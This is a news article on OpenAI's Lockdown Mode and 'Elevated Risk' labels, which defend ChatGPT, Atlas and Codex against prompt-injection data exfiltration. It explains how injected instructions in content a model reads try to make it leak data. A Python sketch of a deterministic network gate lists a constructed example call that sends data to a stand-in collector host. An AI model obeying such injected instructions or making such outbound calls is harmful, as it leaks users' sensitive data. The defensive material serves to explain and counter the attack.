OpenAI adds Lockdown Mode and “Elevated Risk” labels

Written by Joseph Nordqvist / February 17, 2026 at 7:54 AM UTC


OpenAI has introduced Lockdown Mode, an optional security setting in ChatGPT that tightens how the product can interact with external systems. The company also added “Elevated Risk” labels to flag a small set of capabilities in ChatGPT, ChatGPT Atlas, and Codex that may introduce additional security risk.[1][2]

The changes target prompt injection, a class of attacks where malicious instructions are embedded in content a model reads in an effort to make it reveal sensitive data or take unintended actions.

Context and background

Prompt injection has become a higher-stakes problem as AI assistants move beyond chat and into workflows that include browsing, connected apps, and automated actions. OpenAI says the security stakes change when models can interact with the web and external tools.[1]

Outside OpenAI, the UK’s NCSC has warned prompt injection may never be fully mitigated in the same way as SQL injection, and that defenses should focus on reducing risk and impact; industry frameworks such as OWASP also treat it as a top concern.[3][4]

Key details

Lockdown Mode: a deterministic security setting

OpenAI describes Lockdown Mode as an advanced setting for a small group of “highly security-conscious users,” such as executives and security teams, and says it is not necessary for most users.[1]

On its Help Center page, OpenAI says Lockdown Mode “locks down many tools and capabilities” to prevent them from accessing the network. OpenAI says the goal is strong deterministic protection against prompt injection-based data exfiltration, with the trade-off that features are disabled or limited.[2]

The Help Center page lists specific capabilities that are disabled or limited in Lockdown Mode, including:

  • Live web browsing (limited to cached content)

  • Images in ChatGPT responses (users can still upload images and use image generation)

  • Deep Research (disabled)

  • Agent Mode (disabled)

  • Canvas networking approvals (users cannot approve Canvas-generated code to access the network)

  • File downloads for data analysis (ChatGPT cannot download files, but can work on manually uploaded files)

OpenAI says browsing in Lockdown Mode is limited to cached content so no live network requests leave its controlled network. It says some features are disabled when it cannot provide strong deterministic guarantees.[1]

What Lockdown Mode is designed to do, and what it does not do

Lockdown Mode is positioned as an impact-reduction measure. OpenAI says the configuration is designed to block the “final stage” of prompt-injection-driven data exfiltration by deterministically preventing outbound network requests that could transfer sensitive data to an attacker.[2]

Lockdown Mode does not deterministically prevent prompt injections from reaching the model’s context. A malicious prompt could still be present in content the model reads, but Lockdown Mode aims to reduce the risk that such injections can transmit data outward.[2]

OpenAI also says Lockdown Mode does not affect memory, file uploads, or conversation sharing, and notes that many of these can be configured independently by workspace admins.[2]

Apps and connectors: not disabled, but meant to be tightly controlled

OpenAI says apps and connectors can interact with the internet and therefore carry potential exfiltration risk. Instead of disabling apps outright, OpenAI recommends admins configure which apps, and which actions within those apps, are available to users in Lockdown Mode.[2]

The Help Center provides risk guidance, treating write actions as generally riskier than read actions because they can create observable side effects. It recommends limiting enabled actions to the minimum needed, and avoiding untrusted apps and certain write actions for high-risk users.[2]
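A minimal sketch of the design idea in the two sections above, added here as an illustration and not OpenAI's implementation: a gate that decides on the type of tool call and an admin allowlist only, so injected text can still reach the model but cannot change what leaves the network. The tool names, app names, URLs and policy shape are all hypothetical.

```python
from dataclasses import dataclass

# Hypothetical tool names, modelled on the kinds of capabilities the article lists.
NETWORK_TOOLS = frozenset({"live_browse", "deep_research", "agent_mode", "file_download"})

@dataclass(frozen=True)
class ToolCall:
    tool: str         # built-in tool name, or "app:<name>" for a connector
    action: str       # e.g. "fetch", "read", "write"
    args: str = ""    # model-controlled, so never consulted by the gate

def authorize(call: ToolCall, lockdown: bool, app_actions: dict) -> tuple:
    """Decide from the call's type and the admin policy only.

    Nothing the model wrote (args) is inspected, so injected text cannot
    talk its way past the gate: same call type, same answer, every time.
    """
    if not lockdown:
        return True, "lockdown off"
    if call.tool.startswith("app:"):
        allowed = app_actions.get(call.tool[4:], frozenset())
        if call.action in allowed:
            return True, "app action allowlisted by admin"
        return False, "app action not allowlisted"
    if call.tool in NETWORK_TOOLS:
        return False, "network-capable tool disabled in lockdown"
    return True, "no outbound network path"

# Constructed admin policy: read-only access to one app, nothing else.
APP_ACTIONS = {"tickets": frozenset({"read"})}

# Constructed calls, as a model might emit them after reading injected content.
CALLS = [
    ToolCall("live_browse", "fetch", "https://collector.example/?d=<data>"),
    ToolCall("cached_browse", "fetch", "https://docs.example/page"),
    ToolCall("app:tickets", "read", "id=42"),
    ToolCall("app:tickets", "write", "comment=<data>"),
    ToolCall("app:unvetted", "read", ""),
]

def decisions(lockdown: bool) -> list:
    """Allow/deny verdict for each constructed call under the given mode."""
    return [authorize(c, lockdown, APP_ACTIONS)[0] for c in CALLS]

if __name__ == "__main__":
    for c in CALLS:
        print(c.tool, c.action, authorize(c, True, APP_ACTIONS))
```

The gate denies the live fetch, the write action and the unvetted app without ever judging whether the arguments look malicious, which is what makes the control deterministic rather than detection-based.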

Availability and admin controls

OpenAI says Lockdown Mode is available for ChatGPT Enterprise, ChatGPT Edu, ChatGPT for Healthcare, and ChatGPT for Teachers. Workspace admins can enable it by creating a role in Workspace Settings and assigning users to that role.[1][2]

OpenAI points admins to its Compliance API Logs Platform as a separate mechanism to provide visibility into app usage, shared data, and connected sources.[1][2]

OpenAI says it plans to make Lockdown Mode available to consumers “in the coming months.”[1] The Help Center adds that it is not yet available on Plus, Pro, Free, or Teams, and that OpenAI plans to expand to consumer and Team plans in the coming months.[2]

“Elevated Risk” labels across ChatGPT, Atlas, and Codex

OpenAI says it is standardizing “Elevated Risk” labels for a short list of existing capabilities across ChatGPT, ChatGPT Atlas, and Codex. The labels are meant to provide consistent in-product guidance when a feature introduces additional risk, particularly network-related capabilities.[1]

OpenAI’s example is Codex network access, where developers can allow Codex to take actions on the web and see an “Elevated Risk” warning in settings.[1]

The Help Center also states that Lockdown Mode does not affect network access in Codex.

Why this change, and why now?

The core issue is that prompt injection becomes more operationally dangerous when assistants can browse, call tools, or interact with connected systems. Microsoft’s MSRC has described “indirect prompt injection” as malicious instructions embedded in content a system reads, and argues for defense in depth that combines multiple layers of mitigations rather than relying on any single safeguard.[5]

The UK’s NCSC has also warned that comparing prompt injection to SQL injection is “dangerous,” arguing that prompt injection should be approached by reducing risk and impact rather than assuming it can be fully mitigated.[3]

Recent research and incident reporting on adjacent enterprise assistants have reinforced the same risk pattern. Varonis described a “single-click” Microsoft Copilot attack, called Reprompt, aimed at data exfiltration. Microsoft has since patched the issue, according to reporting.[6]

OpenAI’s rollout pairs product restrictions with clearer warnings. Lockdown Mode narrows or removes high-risk pathways for users at highest risk, while “Elevated Risk” labels aim to make the security trade-offs more visible when users enable network-related capabilities.[1][2]

Why this matters

For organizations, Lockdown Mode is a signal that certain AI features now sit in the security domain. When assistants can connect to the web and apps, the problem shifts from unsafe output to controlling which actions and data flows are possible in the first place.[1][2]

For individual users, the change is likely to make risk more visible. The “Elevated Risk” labels are meant to warn users when they enable network-related capabilities that can introduce new exposure.[1]

Brief outlook

OpenAI says it will remove “Elevated Risk” labels once security advances sufficiently mitigate the risks for general use, and that the set of labeled features may change over time. The company has not listed which features will be added or removed next.

OpenAI says Lockdown Mode will reach consumer and Team plans “in the coming months,” but it has not provided dates or rollout detail.[2]


Joseph founded AI News Home in 2026. He studied marketing and later completed a postgraduate program in AI and machine learning (business applications) at UT Austin’s McCombs School of Business. He is now pursuing an MSc in Computer Science at the University of York.

This article was written by the AI News Home editorial team with the assistance of AI-powered research and drafting tools. All analysis, conclusions, and editorial decisions were made by human editors.

References

  1.
  2.
  3. Prompt injection is not SQL injection (it may be worse). David C, National Cyber Security Centre, December 8, 2025
  4.
  5. How Microsoft defends against indirect prompt injection attacks. Andrew Paverd, Microsoft, July 29, 2025
  6.
